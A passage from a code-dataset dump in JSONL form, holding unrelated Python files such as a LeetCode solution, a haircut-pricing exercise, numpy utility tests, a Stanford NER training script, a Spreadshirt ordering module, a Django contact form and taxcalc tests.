O(1)\n#LeetCode acceptance = Yes\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n # base case\n if not nums:\n return 0\n Notchosen = 0\n chosen = nums[0]\n for i in range(1,len(nums)):\n chosen, Notchosen = nums[i] + Notchosen, max(Notchosen, chosen)\n return max(chosen, Notchosen)","sub_path":"HouseRobber3.py","file_name":"HouseRobber3.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"229068897","text":"# Help hairdresser advertise cheapest haircuts\n\n# list of all hairstyles offered at hairdresser\nhairstyles = [\"bouffant\", \"pixie\", \"dreadlocks\", \"crew\", \"bowl\", \"bob\", \"mohawk\", \"flattop\"]\n\n# list of prices associated with hairstyles listed above\nprices = [30, 25, 40, 20, 20, 35, 50, 35]\n\n# number of haircuts completed the previous week by hairstyle\nlast_week = [2, 3, 5, 8, 4, 4, 6, 2]\n\n# set price to 0\ntotal_price = 0\n\n# reiterate through all prices to print the sum\nfor price in prices:\n total_price += price\n print(total_price)\n\n# determine average price of a haircut\naverage_price = total_price / len(prices)\n\nprint(\"Average Haircut Price: \" + str(average_price))\n\n# reduce the price of all haircuts by $5\nnew_prices = [price - 5 for price in prices]\n\nprint(new_prices)\n\n# set total_revenue to 0\ntotal_revenue = 0\n\n# reiterate through new_prices to determine revenue generated the previous week\nfor i in range(0, len(hairstyles)):\n tot_rev = prices[i] * last_week[i]\n total_revenue += tot_rev\n print(\"Total Revenue: \" + str(total_revenue))\n\n# determine average daily revenue based on total_revenue\naverage_daily_revenue = total_revenue / 7\n\n# determine all haircuts under $30 based on list enumeration created for new_prices\ncuts_under_30 = [hairstyles[i] for i in range(0, len(new_prices - 1)) if new_prices[i] < 30]\n\n# print all haircuts under $30\nprint(cuts_under_30)\n","sub_path":"cheapest_haircut_challenge.py","file_name":"cheapest_haircut_challenge.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"144374234","text":"from __future__ import print_function\n\nimport numpy as np\nfrom dynamic_graph.sot_talos_balance.joint_position_controller import (\n JointPositionController,\n)\n\ncontroller = JointPositionController(\"ciao\")\n\n# print(\"Commands:\")\n# print(controller.commands())\n\nprint(\"\\nSignals (at creation):\")\ncontroller.displaySignals()\n\nN_JOINTS = 2\n\ncontroller.Kp.value = np.array(N_JOINTS * [10.0])\ncontroller.state.value = np.array([0.0] * 6 + N_JOINTS * [0.0])\ncontroller.qDes.value = np.array(N_JOINTS * [1.0])\ncontroller.dqDes.value = np.array(N_JOINTS * [0.0])\n\ncontroller.init(N_JOINTS)\n\ncontroller.dqRef.recompute(1)\n\nprint(\"\\nKp: %s\" % (controller.Kp.value,))\nprint(\"\\nq: %s\" % (controller.state.value,))\nprint(\"qDes: %s\" % (controller.qDes.value,))\nprint(\"dqDes: %s\" % (controller.dqDes.value,))\n\nprint(\"\\ndqRef: %s\" % (controller.dqRef.value,))\n","sub_path":"tests/python/test_control.py","file_name":"test_control.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"544389939","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport xml.dom.minidom\nfrom xml.dom.minidom import parse\n\n#open a directory\ndirectory = os.getcwd()\npath = '../islandora/modsCollections/'\ndirs = os.listdir(path)\n\n\n\nfor files in dirs:\n\tif files.endswith(\".xml\"):\n\t\t#print(\"{} is a file in {}\".format(files, directory))\n\t\tinfile = open(\"../islandora/modsCollections/\" + files, \"r\", encoding=\"UTF-8\")\n\t\tdatasource = xml.dom.minidom.parse(infile)\n\t\tdom_in = datasource\n\t\trecords = dom_in.getElementsByTagName(\"mods\")\n\t\tfor record in records:\n\t\t\tidentifier = record.getElementsByTagName(\"identifier\")[0].firstChild.nodeValue\n\t\t\toutfile = open(\"../islandora/modsCollections/modsRecords/\" + str(identifier) + \".xml\", \"wb\")\n\t\t\tprint(\"Writing \" + identifier.replace('\"', \"\") + \".xml...\")\n\t\t\toutfile.write(record.toprettyxml(encoding='UTF-8'))\n\t\t\toutfile.close()\n\n","sub_path":"osdir.py","file_name":"osdir.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"288689384","text":"import unittest\nimport pyfilter.utils.utils as helps\nfrom scipy.stats import wishart\nimport numpy as np\nfrom scipy.optimize import minimize\nfrom time import time\n\n\nclass Tests(unittest.TestCase):\n def test_OuterProduct(self):\n a = np.random.normal(size=(3, 3))\n b = np.random.normal(size=(3, 3))\n\n true = a.dot(b.dot(a.T))\n est = helps.outer(a, b)\n\n assert np.allclose(true, est)\n\n def test_Dot(self):\n a = np.random.normal(size=(2, 2))\n b = np.random.normal(size=2)\n \n trueval = a.dot(b)\n\n est = helps.dot(a, b)\n\n assert np.allclose(trueval, est)\n\n def test_Outerv(self):\n a = np.random.normal(size=2)\n b = np.random.normal(size=2)\n\n trueval = a[:, None].dot(b[None, :])\n\n est = helps.outerv(a, b)\n\n assert np.allclose(est, trueval)\n\n def test_ExpandDims(self):\n a = np.random.normal(size=(3, 3))\n b = np.random.normal(size=(3, 3, 500, 500))\n\n newa = helps.expanddims(a, b.ndim)\n\n assert newa.shape == (3, 3, 1, 1)\n\n def test_mdot(self):\n a = np.random.normal(size=(3, 3))\n b = np.empty((*a.shape, 300, 300))\n b[:, :] = helps.expanddims(a, b.ndim)\n\n est = helps.mdot(a, b)\n\n assert np.allclose(est, helps.expanddims(a.dot(a), b.ndim))\n\n def test_CustomCholesky(self):\n cov = wishart(3, scale=np.eye(3)).rvs()\n\n extendedcov = np.empty((*cov.shape, 300, 300))\n extendedcov[:, :] = helps.expanddims(cov, extendedcov.ndim)\n\n choleskied = np.linalg.cholesky(cov)\n\n assert np.allclose(helps.expanddims(choleskied, extendedcov.ndim), helps.customcholesky(extendedcov))\n\n def test_Outerm(self):\n a = np.random.normal(size=(3, 3))\n b = np.random.normal(size=(3, 3))\n\n trueouter = a.dot(b.T)\n\n calcouter = helps.outerm(a, b)\n\n assert np.allclose(trueouter, calcouter)\n\n def test_BFGS(self):\n for i in range(500):\n x = np.random.normal()\n m = np.random.normal()\n\n func = lambda u: -np.exp(-(u - m) ** 2 / 2)\n\n trueanswer = minimize(func, x)\n approximate = helps.bfgs(func, x, tol=1e-8)\n\n assert (np.abs(m - approximate.x) < 1e-7)\n\n def test_BFGS_ParallellOptimization(self):\n x = np.random.normal(size=(1, 5000))\n m = np.random.normal()\n\n func = lambda u: -np.exp(-(u - m) ** 2 / 2)\n\n truestart = time()\n trueanswers = np.array([minimize(func, x[:, i]).x for i in range(x.shape[-1])])\n truetime = time() - truestart\n\n approxstart = time()\n approximate = helps.bfgs(func, x, tol=1e-7)\n approxtime = time() - approxstart\n\n print('naive: {:.3f}, parallel: {:.3f}, speedup: {:.2f}x'.format(truetime, approxtime, truetime / approxtime))\n\n assert (np.abs(approximate.x - m) < 1e-7).mean() > 0.95 and truetime / approxtime > 2","sub_path":"test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"76880068","text":"import torch\r\n\r\ndata = torch.tensor([[3,4],[5,6],[7,8],[9,8],[6,5]])\r\nlabel = torch.Tensor([0,0,1,0,1])\r\ncenter = torch.tensor([[1,1],[2,2]])\r\n\r\ncenter_exp = center.index_select(dim=0,index=label.long())\r\nprint(center_exp)\r\n\r\ncount = torch.histc(label,bins=2,min=0,max=1)\r\nprint(count)\r\n\r\ncount_exp = count.index_select(dim=0,index=label.long())\r\nprint(count_exp)\r\n\r\ncenter_loss = torch.sum(torch.div(torch.sqrt(torch.sum(torch.pow(data-center_exp,torch.tensor(2)),dim=1).float()),count_exp))\r\nprint(center_loss)\r\n","sub_path":"24 网络优化/test_20210323/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"152458761","text":"from pylons import app_globals as g, tmpl_context as c\nimport sha, base64, time, re, urllib, socket\nimport ImageFont\nfrom r2.lib.wrapped import Templated\nfrom r2.lib.pages import LinkInfoPage\nfrom r2.models import *\nfrom httplib import HTTPConnection\nfrom urlparse import urlparse\nfrom BeautifulSoup import BeautifulStoneSoup\n\ncolors = ((\"black\",2), (\"white\", 1), (\"navy\",4), (\"heather\",231), (\"red\",5))\nsizes = ((\"small\",2), (\"medium\",3), (\"large\",4), (\"xlarge\", 5), (\"xxlarge\",6))\n\narticles = {\"women\":\n dict(black = 4604645,\n heather = 4604654,\n navy = 4737035,\n red = 4604670,\n white = 4604694,\n ),\n \"men\" :\n dict(black = 4589785,\n heather = 4599883,\n navy = 4737029,\n red = 4589762,\n white = 4589259,\n ) }\n\n\nspreadshirt_url = urlparse(g.spreadshirt_url)\ntry:\n test_font = ImageFont.truetype(g.spreadshirt_test_font,\n int(g.spreadshirt_min_font))\nexcept IOError:\n test_font = None\n\nword_re = re.compile(r\"\\w*\\W*\", re.UNICODE)\ndef layout_text(text, max_width = None):\n if test_font:\n words = list(reversed(word_re.findall(text)))\n lines = [\"\"]\n while words:\n word = words.pop()\n w = test_font.getsize(lines[-1] + word)[0]\n if w < max_width:\n lines[-1] += word\n else:\n lines.append(word)\n lines = [x.strip() for x in filter(None, lines)]\n return all(test_font.getsize(x)[0] < max_width for x in lines), lines\n return None, []\n\ndef spreadshirt_validation(s):\n t = str(int(time.time()))\n return t, base64.b64encode(sha.new(s+t+g.spreadshirt_vendor_id).digest())\n\ndef shirt_request(link, color, style, size, quantity):\n article = articles.get(style, {}).get(color)\n size = dict(sizes).get(size)\n color = dict(colors).get(color)\n\n # load up previous session id (if there was one)\n sessionid = c.cookies.get(\"spreadshirt\")\n sessionid = sessionid.value if sessionid else \"\"\n\n if link and color and size and quantity and article:\n # try to layout the text\n text = ShirtPane.make_text(link)\n if text:\n author = Account._byID(link.author_id, True)\n request_dict = dict(color = color,\n quantity = quantity,\n sessionId = sessionid,\n size = size,\n article_id = article)\n for i, t in enumerate(text):\n request_dict[\"textrow_%d\" % (i+1)] = t\n request_dict[\"textrow_6\"] = \"submitted by %s\" % author.name\n request_dict[\"textrow_7\"] = link._date.strftime(\"%B %e, %Y\")\n text.extend([request_dict[\"textrow_6\"], request_dict[\"textrow_7\"]])\n\n t, code = spreadshirt_validation(\"\".join(text))\n request_dict['timestamp'] = t\n request_dict['hash'] = code\n\n params = urllib.urlencode(request_dict)\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"text/plain\"}\n data = None\n try:\n conn = HTTPConnection(spreadshirt_url.hostname)\n conn.request(\"POST\", spreadshirt_url.path, params, headers)\n response = conn.getresponse()\n if int(response.status) == 200:\n data = BeautifulStoneSoup(response.read())\n conn.close()\n except socket.error:\n return\n\n if data:\n if not data.find(\"error\"):\n session_id = data.sessionid.contents[0]\n data = data.basketurl.contents[0]\n # set session id before redirecting\n c.cookies.add(\"spreadshirt\", session_id)\n else:\n g.log.error(\"Spreadshirt Error:\\n\" )\n g.log.error(data.prettify() + '\\n')\n g.log.error(\"POST and params: \" + g.spreadshirt_url)\n g.log.error(params)\n data = None\n\n return data\n\n\nclass ShirtPage(LinkInfoPage):\n extension_handling= False\n additional_css = \"spreadshirt.css\"\n def __init__(self, *a, **kw):\n kw['show_sidebar'] = False\n LinkInfoPage.__init__(self, *a, **kw)\n\n def content(self):\n return self.content_stack((self.link_listing,\n ShirtPane(self.link)))\n\nclass ShirtPane(Templated):\n default_color = \"black\"\n default_size = \"large\"\n default_style = \"men\"\n\n colors = [x for x, y in colors]\n styles = (\"men\", \"women\")\n sizes = [x for x, y in sizes]\n\n def __init__(self, link, **kw):\n Templated.__init__(self, link = link, text = self.make_text(link), **kw)\n\n @classmethod\n def make_text(cls, link):\n fit, text = layout_text(link.title,\n int(g.spreadshirt_max_width))\n if len(text) > 5 or not fit:\n text = []\n return text\n","sub_path":"virtual/libs/spreadshirt.py","file_name":"spreadshirt.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"197038307","text":"\"\"\"\nThis Script, creates the property file for different training data files, then trains a CRF and tests it on 2 different test sets testA, testB.\n\"\"\"\nimport subprocess\nimport re\n\n\ndef test_on_testB(numberOfSeeds):\n ''' Testing the trained crf on testB '''\n outputfile = open('/Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/aaaembedingclustering_testBoutputs.txt', 'a')\n for iteration in range(0, 10):\n command='java -cp /Users/sepidehmesbah/Downloads/stanford-ner-2016-10-31/stanford-ner.jar edu.stanford.nlp.ie.crf.CRFClassifier -loadClassifier /Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/embedingclustering_splitted'+ str(numberOfSeeds) + '_' + str(iteration) +'.ser.gz -testFile /Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/X_testB_50_manually_splitted3.tsv'\n p = subprocess.call(command,\n stdout=outputfile,\n stderr=subprocess.STDOUT, shell=True)\n outputfile.close()\n\n#run_command('java -cp /Users/sepidehmesbah/Downloads/stanford-ner-2016-10-31/stanford-ner.jar edu.stanford.nlp.ie.crf.CRFClassifier -loadClassifier /Users/sepidehmesbah/Downloads/stanford-ner-2016-10-31/seednames_splitted2_1.tsv.ser.gz -testFile /Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/X_testB_50_manually_splitted.tsv')\n\n\n###############\n\ndef training_austenprop(numberOfSeeds):\n ''' Training the CRF and testing on TestA '''\n outputfile=open('/Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/aaaembedingclustering__testAoutputs.txt','a')\n for iteration in range(0, 10):\n\n command = 'java -cp /Users/sepidehmesbah/Downloads/stanford-ner-2016-10-31/stanford-ner.jar edu.stanford.nlp.ie.crf.CRFClassifier -prop /Users/sepidehmesbah/Downloads/ner-crf-master/prop_files/austen' + str(numberOfSeeds) + '_' + str(iteration) + '.prop'\n\n p = subprocess.call(command,\n stdout=outputfile,\n stderr=subprocess.STDOUT, shell=True)\n\n\n\n\ndef create_austenprop(numberOfSeeds):\n ''' Generating the property files'''\n outputfile = open('/Users/sepidehmesbah/Downloads/ner-crf-master/evaluation/austen.prop', 'r')\n text=outputfile.read()\n print(text)\n for iteration in range(0, 10):\n modifiedpath='trainFile=/Users/sepidehmesbah/Downloads/ner-crf-master/evaluation_files/embedingclustering_splitted' + str(numberOfSeeds) + '_' + str(iteration) + '.txt'\n modifiedpathtest = 'testFile=/Users/sepidehmesbah/Downloads/ner-crf-master/evaluation_files/embedingclustering_test_splitted' + str(numberOfSeeds) + '_' + str(iteration) + '.txt'\n serializeTo='serializeTo=seednames__splitted' + str(numberOfSeeds) + '_' + str(iteration) +'.ser.gz'\n edited = re.sub(r'trainFile.*?txt', modifiedpath, text, flags=re.DOTALL)\n edited = re.sub(r'testFile.*?txt', modifiedpathtest, edited, flags=re.DOTALL)\n edited = re.sub(r'serializeTo.*?gz', serializeTo, edited, flags=re.DOTALL)\n print(edited)\n text_file = open('/Users/sepidehmesbah/Downloads/ner-crf-master/prop_files/austen'+ str(numberOfSeeds) + '_' + str(iteration) + '.prop', 'w')\n text_file.write(edited)\n text_file.close()\n\n# create_austenprop(2)\n# create_austenprop(5)\n# create_austenprop(10)\n# create_austenprop(25)\n# create_austenprop(50)\n# create_austenprop(100)\n# training_austenprop(2)\n# training_austenprop(5)\n# training_austenprop(10)\n# training_austenprop(25)\n# training_austenprop(50)\n# training_austenprop(100)\ntest_on_testB(2)\ntest_on_testB(5)\ntest_on_testB(10)\ntest_on_testB(25)\ntest_on_testB(50)\ntest_on_testB(100)\n\n","sub_path":"ner_training.py","file_name":"ner_training.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"542452712","text":"# See LICENSE for licensing information.\n#\n# Copyright (c) 2016-2020 Regents of the University of California and The Board\n# of Regents for the Oklahoma Agricultural and Mechanical College\n# (acting for and on behalf of Oklahoma State University)\n# All rights reserved.\n#\nfrom globals import OPTS\n\nclass _pins:\n def __init__(self, pin_dict):\n # make the pins elements of the class to allow \".\" access.\n # For example: props.bitcell.cell_6t.pin.bl = \"foobar\"\n for k,v in pin_dict.items():\n self.__dict__[k] = v\n\nclass _cell:\n def __init__(self, pin_dict):\n pin_dict.update(self._default_power_pins())\n self._pins = _pins(pin_dict)\n\n @property\n def pin(self):\n return self._pins\n\n def _default_power_pins(self):\n return { 'vdd' : 'vdd', 'gnd' : 'gnd' }\n\nclass _mirror_axis:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\nclass _bitcell:\n def __init__(self, mirror, split_wl, cell_s8_6t, cell_6t, cell_1rw1r, cell_1w1r):\n self.mirror = mirror\n self.split_wl = split_wl\n self._s8_6t = cell_s8_6t\n self._6t = cell_6t\n self._1rw1r = cell_1rw1r\n self._1w1r = cell_1w1r\n\n def _default():\n axis = _mirror_axis(True, False)\n\n cell_s8_6t = _cell({'bl' : 'bl0',\n 'br' : 'bl1',\n 'wl': 'wl'})\n\n cell_6t = _cell({'bl' : 'bl',\n 'br' : 'br',\n 'wl' : 'wl'})\n\n cell_1rw1r = _cell({'bl0' : 'bl0',\n 'br0' : 'br0',\n 'bl1' : 'bl1',\n 'br1' : 'br1',\n 'wl0' : 'wl0',\n 'wl1' : 'wl1'})\n\n cell_1w1r = _cell({'bl0' : 'bl0',\n 'br0' : 'br0',\n 'bl1' : 'bl1',\n 'br1' : 'br1',\n 'wl0' : 'wl0',\n 'wl1' : 'wl1'})\n\n return _bitcell(cell_s8_6t=cell_s8_6t,\n cell_6t=cell_6t,\n cell_1rw1r=cell_1rw1r,\n cell_1w1r=cell_1w1r,\n split_wl = [],\n mirror=axis)\n\n @property\n def cell_s8_6t(self):\n return self._s8_6t\n\n @property\n def cell_6t(self):\n return self._6t\n\n @property\n def cell_1rw1r(self):\n return self._1rw1r\n\n @property\n def cell_1w1r(self):\n return self._1w1r\n\n\nclass _dff:\n def __init__(self, use_custom_ports, custom_port_list, custom_type_list, clk_pin):\n self.use_custom_ports = use_custom_ports\n self.custom_port_list = custom_port_list\n self.custom_type_list = custom_type_list\n self.clk_pin = clk_pin\n\nclass _dff_buff:\n def __init__(self, use_custom_ports, custom_buff_ports, add_body_contacts):\n self.use_custom_ports = use_custom_ports\n self.buf_ports = custom_buff_ports\n self.add_body_contacts = add_body_contacts\n\nclass _dff_buff_array:\n def __init__(self, use_custom_ports, add_body_contacts):\n self.use_custom_ports = use_custom_ports\n self.add_body_contacts = add_body_contacts\n\nclass _bitcell_array:\n def __init__(self, use_custom_cell_arrangement):\n self.use_custom_cell_arrangement = use_custom_cell_arrangement\n\nclass cell_properties():\n \"\"\"\n This contains meta information about the custom designed cells. For\n instance, pin names, or the axis on which they need to be mirrored. These\n can be overriden in the tech.py file.\n \"\"\"\n def __init__(self):\n self.names = {}\n\n self._bitcell = _bitcell._default()\n \n self._dff = _dff(use_custom_ports = False,\n custom_port_list = [\"D\", \"Q\", \"clk\", \"vdd\", \"gnd\"],\n custom_type_list = [\"INPUT\", \"OUTPUT\", \"INPUT\", \"POWER\", \"GROUND\"],\n clk_pin= \"clk\")\n \n self._dff_buff = _dff_buff(use_custom_ports = False,\n custom_buff_ports = [\"D\", \"qint\", \"clk\", \"vdd\", \"gnd\"],\n add_body_contacts = False)\n\n self._dff_buff_array = _dff_buff_array(use_custom_ports = False,\n add_body_contacts = False)\n\n self._write_driver = _cell({'din': 'din',\n 'bl' : 'bl',\n 'br' : 'br',\n 'en' : 'en'})\n\n self._sense_amp = _cell({'bl' : 'bl',\n 'br' : 'br',\n 'dout' : 'dout',\n 'en' : 'en'})\n\n self._bitcell_array = _bitcell_array(use_custom_cell_arrangement = [])\n\n @property\n def bitcell(self):\n return self._bitcell\n\n @property\n def dff(self):\n return self._dff\n \n @property\n def dff_buff(self):\n return self._dff_buff\n\n @property\n def dff_buff_array(self):\n return self._dff_buff_array\n\n @property\n def write_driver(self):\n return self._write_driver\n\n @property\n def sense_amp(self):\n return self._sense_amp\n \n @property\n def bitcell_array(self):\n return self._bitcell_array\n\n def compare_ports(self, port_list):\n use_custom_arrangement = False\n for ports in port_list:\n if ports == \"{}R_{}W_{}RW\".format(OPTS.num_r_ports, OPTS.num_w_ports, OPTS.num_rw_ports):\n use_custom_arrangement = True\n break\n return use_custom_arrangement\n","sub_path":"compiler/base/custom_cell_properties.py","file_name":"custom_cell_properties.py","file_ext":"py","file_size_in_byte":5651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"69975090","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.core.mail import EmailMessage\n\n\nclass ContatoForm(forms.Form):\n\n nome = forms.CharField(label='Nome')\n email = forms.EmailField(label='E-mail')\n assunto = forms.CharField(label='Assunto', min_length=10)\n mensagem = forms.CharField(label='Mensagem', widget=forms.Textarea())\n\n def send_mail(self):\n to = ['oliveira.matheusde@gmail.com']\n subject = 'Enviado Pelo Website'\n values = self.cleaned_data\n\n body = \"\"\"\n \n \n \n WebVerde\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
WebVerde
Nome:{nome}
E-mail:{email}
Assunto:{assunto}
Mensagem:{mensagem}
\n \n \n \"\"\".format(nome=values['nome'], email=values['email'],\n assunto=values['assunto'], mensagem=values['mensagem'])\n\n # EmailMessage(subject, body, values['email'], [to])\n teste = EmailMessage(subject, body, to=to)\n teste.content_subtype = 'html'\n teste.send()\n","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546877097","text":"import os\nimport sys\nimport json\nCUR_PATH = os.path.abspath(os.path.dirname(__file__))\nsys.path.append(os.path.join(CUR_PATH, \"../../\"))\nimport numpy as np\nfrom numpy.testing import assert_array_equal\nimport pandas as pd\nimport tempfile\nimport pytest\nfrom taxcalc import Policy, Records, Calculator\nfrom taxcalc import create_distribution_table, create_difference_table\n\n\n# use 1991 PUF-like data to emulate current PUF, which is private\nTAX_DTA_PATH = os.path.join(CUR_PATH, '../../tax_all1991_puf.gz')\nTAX_DTA = pd.read_csv(TAX_DTA_PATH, compression='gzip')\n# PUF-fix-up: MIdR needs to be type int64 to match PUF\nTAX_DTA['MIDR'] = TAX_DTA['MIDR'].astype('int64')\n# specify WEIGHTS appropriate for 1991 data\nWEIGHTS_FILENAME = '../../WEIGHTS_testing.csv'\nWEIGHTS_PATH = os.path.join(CUR_PATH, WEIGHTS_FILENAME)\nWEIGHTS = pd.read_csv(WEIGHTS_PATH)\n\nIRATES = {1991: 0.015, 1992: 0.020, 1993: 0.022, 1994: 0.020, 1995: 0.021,\n 1996: 0.022, 1997: 0.023, 1998: 0.024, 1999: 0.024, 2000: 0.024,\n 2001: 0.024, 2002: 0.024, 2003: 0.024, 2004: 0.024}\n\nWRATES = {1991: 0.0276, 1992: 0.0419, 1993: 0.0465, 1994: 0.0498,\n 1995: 0.0507, 1996: 0.0481, 1997: 0.0451, 1998: 0.0441,\n 1999: 0.0437, 2000: 0.0435, 2001: 0.0430, 2002: 0.0429,\n 2003: 0.0429, 2004: 0.0429}\n\nRAWINPUTFILE_FUNITS = 4\nRAWINPUTFILE_YEAR = 2015\nRAWINPUTFILE_CONTENTS = (\n 'RECID,MARS\\n'\n '1,2\\n'\n '2,1\\n'\n '3,4\\n'\n '4,6\\n'\n)\n\n\n@pytest.yield_fixture\ndef rawinputfile():\n \"\"\"\n Temporary input file that contains minimum required input varaibles.\n \"\"\"\n ifile = tempfile.NamedTemporaryFile(mode='a', delete=False)\n ifile.write(RAWINPUTFILE_CONTENTS)\n ifile.close()\n # must close and then yield for Windows platform\n yield ifile\n if os.path.isfile(ifile.name):\n try:\n os.remove(ifile.name)\n except OSError:\n pass # sometimes we can't remove a generated temporary file\n\n\n@pytest.yield_fixture\ndef policyfile():\n txt = \"\"\"{\"_almdep\": {\"value\": [7150, 7250, 7400]},\n \"_almsep\": {\"value\": [40400, 41050]},\n \"_rt5\": {\"value\": [0.33 ]},\n \"_rt7\": {\"value\": [0.396]}}\"\"\"\n f = tempfile.NamedTemporaryFile(mode=\"a\", delete=False)\n f.write(txt + \"\\n\")\n f.close()\n # Must close and then yield for Windows platform\n yield f\n os.remove(f.name)\n\n\ndef run():\n parm = Policy()\n assert parm.current_year == 2013\n recs = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=parm, records=recs)\n assert calc.current_year == 2013\n calc.calc_all()\n rshape = calc.records.e00100.shape\n totaldf = pd.DataFrame()\n for attr in dir(calc.records):\n value = getattr(calc.records, attr)\n if hasattr(value, \"shape\"):\n if value.shape == rshape:\n totaldf[attr] = value\n Col_names = ['EICYB1', 'EICYB2', 'EICYB3', 'NIIT', '_addamt', '_addtax',\n '_agep', '_ages', '_agierr', '_alminc', '_amed', '_amt15pc',\n '_amt20pc', '_amt25pc', '_amt5pc', '_amtfei', '_amtsepadd',\n '_amtstd', '_avail', '_cglong', '_cmbtp', '_comb',\n '_combined', '_ctc1', '_ctc2', '_ctcagi', '_ctctax', '_dclim',\n '_dwks12', '_dwks16', '_dwks17', '_dwks21', '_dwks25',\n '_dwks26', '_dwks28', '_dwks31', '_dwks5', '_dwks9', '_dy',\n '_earned', '_eitc', '_exocrd', '_expanded_income', '_feided',\n '_feitax', '_fica', '_hasgain', '_ieic', 'c03260',\n '_limitratio', '_line17', '_line19', '_line22', '_line30',\n '_line31', '_line32', '_line33', '_line34', '_line35',\n '_line36', '_modagi', '_nctcr', '_ncu13', '_ngamty', '_noncg',\n '_nonlimited', '_num', '_numextra', '_oldfei', '_othadd',\n '_othded', '_othertax', '_othtax', '_parents', '_phase2_i',\n '_posagi', '_precrd', '_preeitc', '_prexmp', '_refund',\n '_regcrd', '_s1291', '_sep', '_sey', 'c09400', 'c03260',\n '_seywage', '_standard', '_statax', '_tamt2', '_taxbc',\n '_taxinc', '_taxspecial', '_tratio', '_txpyers',\n '_val_rtbase', '_val_rtless', '_val_ymax', '_xyztax', '_ymod',\n '_ymod1', '_ymod2', '_ymod3', '_ywossbc', '_ywossbe',\n 'c00100', 'c01000', 'c02500', 'c02650', 'c02700', 'c02900',\n 'c04100', 'c04200', 'c04470', 'c04500', 'c04600', 'c04800',\n 'c05100', 'c05200', 'c05700', 'c05750', 'c05800', 'c07100',\n 'c07150', 'c07180', 'c07220', 'c07230', 'c07240', 'c07300',\n 'c07600', 'c07970', 'c08795', 'c08800', 'c09200', 'c09600',\n 'c10300', 'c10950', 'c10960', 'c11055', 'c11070', 'c15100',\n 'c15200', 'c17000', 'c17750', 'c18300', 'c19200', 'c19700',\n 'c20400', 'c20500', 'c20750', 'c20800', 'c21040', 'c21060',\n 'c23650', 'c24505', 'c24510', 'c24516', 'c24517', 'c24520',\n 'c24530', 'c24534', 'c24540', 'c24550', 'c24560', 'c24570',\n 'c24580', 'c24597', 'c24598', 'c24610', 'c24615', 'c32800',\n 'c32840', 'c32880', 'c32890', 'c33000', 'c33200', 'c33400',\n 'c33465', 'c33470', 'c33475', 'c33480', 'c37703', 'c59430',\n 'c59450', 'c59460', 'c59485', 'c59490', 'c59560', 'c59660',\n 'c59680', 'c59700', 'c59720', 'c60000', 'c60130', 'c60200',\n 'c60220', 'c60240', 'c60260', 'c62100', 'c62100_everyone',\n 'c62600', 'c62700', 'c62720', 'c62730', 'c62740', 'c62745',\n 'c62747', 'c62755', 'c62760', 'c62770', 'c62780', 'c62800',\n 'c62900', 'c63000', 'c63100', 'c82880', 'c82885', 'c82890',\n 'c82900', 'c82905', 'c82910', 'c82915', 'c82920', 'c82925',\n 'c82930', 'c82935', 'c82937', 'c82940', 'c87482', 'c87483',\n 'c87487', 'c87488', 'c87492', 'c87493', 'c87497', 'c87498',\n 'c87521', 'c87530', 'c87540', 'c87550', 'c87560', 'c87570',\n 'c87580', 'c87590', 'c87600', 'c87610', 'c87620', 'c87654',\n 'c87656', 'c87658', 'c87660', 'c87662', 'c87664', 'c87666',\n 'c87668', 'c87681', 'e00650', 'e02500', 'e08795', 'h82880',\n 'x04500', 'x07100', 'y07100', 'y62745']\n df = totaldf[Col_names]\n exp_results_file = os.path.join(CUR_PATH, '../../exp_results.csv.gz')\n exp_results = pd.read_csv(exp_results_file, compression='gzip')\n exp_set = set(exp_results.columns) # fix-up to bad colname in exp_results\n cur_set = set(df.columns)\n assert exp_set == cur_set\n for label in exp_results.columns:\n lhs = exp_results[label].values.reshape(len(exp_results))\n rhs = totaldf[label].values.reshape(len(exp_results))\n res = np.allclose(lhs, rhs, atol=1e-02)\n if not res:\n print('Problem found in: ', label)\n\n\ndef test_sequence():\n run()\n\n\ndef test_make_Calculator():\n parm = Policy()\n assert parm.current_year == 2013\n recs = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc = Calculator(policy=parm, records=recs)\n assert calc.current_year == 2013\n\n\ndef test_make_Calculator_deepcopy():\n import copy\n parm = Policy()\n recs = Records(data=TAX_DTA, weights=WEIGHTS, start_year=2009)\n calc1 = Calculator(policy=parm, records=recs)\n calc2 = copy.deepcopy(calc1)\n assert isinstance(calc2, Calculator)\n\n\ndef test_make_Calculator_with_policy_reform():\n # create a Policy object and apply a policy reform\n policy2 = Policy()\n reform2 = {2013: {'_II_em': np.array([4000]), 